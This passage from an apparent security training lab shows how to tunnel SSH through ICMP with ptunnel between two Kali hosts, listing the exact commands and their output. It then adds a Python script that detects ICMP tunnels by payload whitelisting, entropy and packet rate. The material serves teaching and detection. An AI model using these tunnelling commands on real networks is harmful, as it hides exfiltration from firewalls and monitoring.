firewall, it might be tunneled through an allowed protocol. Even if the required protocol is allowed, it might
be conspicuous; tunneling the conspicuous protocol through a less conspicuous protocol may also be the
objective. Another reason may be to add a layer of privacy and obfuscation. SSH, SSL and IPsec are all
protocols that provide privacy. Tunneling through them can hide the data being exfiltrated.

This lab task will demonstrate tunneling exfiltrated data via an ICMP tunnel. To make this demonstration fit
within the time constraints of the lab, we will create an ICMP tunnel between the Inside Kali host (the tunnel
proxy client) and the Outside-Kali host (the tunnel proxy server), allowing the Inside Kali host SSH traffic to
be tunneled using ICMP echo request and echo reply packets.

SSH itself provides privacy. Using an ICMP tunnel hides the presence of the SSH traffic.

Task 51
From the Outside Kali host, enter the ptunnel command without any command options to start the ptunnel
proxy server on the Outside Kali host side.

Answer

root@Outside-Kali:~# ptunnel
[inf]: Starting ptunnel v 0.71.
[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.

Note the following:

• Ptunnel is an application that allows you to tunnel TCP connections to a remote host using ICMP echo
request and reply packets.

Task 52
Access the Inside Kali host, open a terminal window and enter the ptunnel -p 209.165.200.235 -lp 2222
-da 209.165.200.235 -dp 22 command to setup the ptunnel proxy client on the Inside Kali host side.

Answer

root@Inside-Kali:~# ptunnel -p 209.165.200.235 -lp 2222 -da 209.165.200.235 -dp 22
[inf]: Starting ptunnel v 0.71.
[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Relaying packets from incoming TCP streams.

The ptunnel -p option says where the proxy server is, -lp is the local port on the proxy client, and -da and
-dp specify where the proxy server is supposed to forward the traffic that is leaving the tunnel. In this step, we
are only forwarding the traffic back to the Outside-Kali host (209.165.200.235) on port 22, but we could have
forwarded the traffic to anywhere that the Outside Kali host can reach.

Task 53

Launch Wireshark (Applications > 09 Sniffing & Spoofing > wireshark) on the Inside Kali host and start a packet
capture on the eth0 interface.

Task 54

On the Inside Kali host (ptunnel proxy client), open another new terminal window and launch SSH, connecting to
local port 2222 on localhost. Use Cisco123! as the password. This will cause the SSH traffic to be tunneled inside
ICMP by ptunnel.

Answer

root@Inside-Kali:~# ssh -p 2222 localhost
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
ECDSA key fingerprint is 63:38:d7:2c:51:d0:fe:f9:92:2d:e8:a7:30:7e:f2:e8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (ECDSA) to the list of known hosts.
root@localhost's password: Cisco123!

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Task 55

Examine the Wireshark packet capture on the Inside Kali host. You should not see any SSH traffic. You should see a lot
of ICMP echo requests and echo replies! You can do other things with this SSH connection, but this is enough to
demonstrate the tunnel.

Answer
Task 56
You may want to close things such as Wireshark and ptunnel. Because this is the end of this lab exercise,
they are no longer needed.

In this Attack Endpoints lab exercise, you tunneled SSH traffic inside an ICMP tunnel. Other common
protocols threat actors often use to tunnel their traffic include HTTP, HTTPS, DNS, and IRC. It is very
important for security analysts to be able to recognize malicious tunneling activity, for example, by
examining packet captures for suspicious and unusual payloads inside another protocol, such as DNS or ICMP.
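The capture in Task 55 is exactly the evidence such an analyst works from. As an added example, not part of the lab, the following Python script scores ICMP echo request/reply conversations the way a detection rule could: it first whitelists packets that carry the default Linux or Windows ping payload, then, for anything left, reports how many packets carry non-default data, how many distinct payload sizes appear, the mean byte entropy, and the sustained packet rate. The traffic records are constructed in the script (random bytes stand in for the encrypted SSH stream); 10.10.6.20 is a placeholder for the Inside Kali host, 209.165.200.235 is the Outside Kali host, and 10.10.3.41 and 10.10.3.1 are inside hosts from the lab.

```python
import math
import random
from collections import defaultdict
from typing import Dict, List, Tuple

# Default echo payloads: Linux ping sends an 8-byte timestamp followed by the byte
# pattern 0x10..0x3f (56 bytes in all); Windows ping sends a fixed 32-byte string.
LINUX_PATTERN = bytes(range(0x10, 0x40))
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvwabcdefghi"


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; encrypted or compressed data approaches 8."""
    if not data:
        return 0.0
    counts: Dict[int, int] = defaultdict(int)
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def is_standard_ping_payload(data: bytes) -> bool:
    """True when the payload is what a stock ping utility would send."""
    if data == WINDOWS_PATTERN:
        return True
    body = data[8:]                          # skip the Linux timestamp field
    return len(body) > 0 and body == LINUX_PATTERN[:len(body)]


def score_icmp_flows(records: List[Dict]) -> List[Tuple[Tuple[str, str], List[str]]]:
    """Group echo traffic per (client, server) pair and list the reasons a pair looks tunneled."""
    flows: Dict[Tuple[str, str], List[Dict]] = defaultdict(list)
    for r in records:
        # Requests (type 8) and replies (type 0) of one conversation share a key.
        key = (r["src"], r["dst"]) if r["type"] == 8 else (r["dst"], r["src"])
        flows[key].append(r)

    alerts: List[Tuple[Tuple[str, str], List[str]]] = []
    for key, pkts in flows.items():
        odd = [p["payload"] for p in pkts if not is_standard_ping_payload(p["payload"])]
        if not odd:
            continue                         # every packet is a default ping: ordinary traffic
        n = len(pkts)
        sizes = {len(d) for d in odd}
        mean_entropy = sum(shannon_entropy(d) for d in odd) / len(odd)
        span = max(p["ts"] for p in pkts) - min(p["ts"] for p in pkts)
        rate = n / span if span > 0 else float(n)
        reasons = [f"{len(odd)}/{n} packets carry a non-default payload"]
        if len(sizes) > 3:
            reasons.append(f"{len(sizes)} distinct payload sizes")
        if mean_entropy > 5.0:
            reasons.append(f"mean payload entropy {mean_entropy:.1f} bits/byte")
        if rate > 2.0 and n >= 50:
            reasons.append(f"{rate:.0f} packets/s sustained")
        alerts.append((key, reasons))
    return alerts


def build_sample_records() -> List[Dict]:
    """Constructed traffic: a normal Linux ping exchange and a ptunnel-style stream."""
    rng = random.Random(7)
    recs: List[Dict] = []
    for i in range(10):                      # benign: one request/reply per second to the gateway
        payload = i.to_bytes(8, "big") + LINUX_PATTERN
        recs.append({"ts": float(i), "src": "10.10.3.41", "dst": "10.10.3.1", "type": 8, "payload": payload})
        recs.append({"ts": i + 0.001, "src": "10.10.3.1", "dst": "10.10.3.41", "type": 0, "payload": payload})
    for i in range(200):                     # tunnel: ten packets a second of variable, random-looking data
        size = rng.randint(64, 1024)
        payload = bytes(rng.getrandbits(8) for _ in range(size))
        src, dst, kind = (("10.10.6.20", "209.165.200.235", 8) if i % 2 == 0
                          else ("209.165.200.235", "10.10.6.20", 0))
        recs.append({"ts": i / 10.0, "src": src, "dst": dst, "type": kind, "payload": payload})
    return recs


if __name__ == "__main__":
    for (client, server), reasons in score_icmp_flows(build_sample_records()):
        print(f"{client} <-> {server}: " + "; ".join(reasons))
```

Entropy on its own is a poor discriminator here because the default Linux ping pattern is itself a run of distinct bytes; that is why the whitelist runs first and the scores are only computed over the packets it does not explain. The same structure (known-good payload first, then size, entropy and rate) transfers directly to DNS tunnel detection, with query name length and label entropy in place of payload bytes.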

You performed several ethical hacking experiments, focusing on attacking the endpoints. As an entry-level
security analyst, you should be aware of some of the basic techniques and methods that attackers use to:

• Perform their network reconnaissance
• Exploit system misconfigurations and system flaws
• Install a back door for establishing connectivity to the victim’s machine
• Escalate their access privilege
• Pivot to other systems to expand their footprint
• Use social engineering and phishing to lure the victims into their traps
• Establish a persistent presence on the victim’s machine, so that even if the victim’s machine is
rebooted, the attacker still has control over the victim’s machine
• Hide their traffic by tunneling it inside another protocol that is permitted by the firewall, and is less
likely to be inspected, such as tunneling inside DNS or ICMP
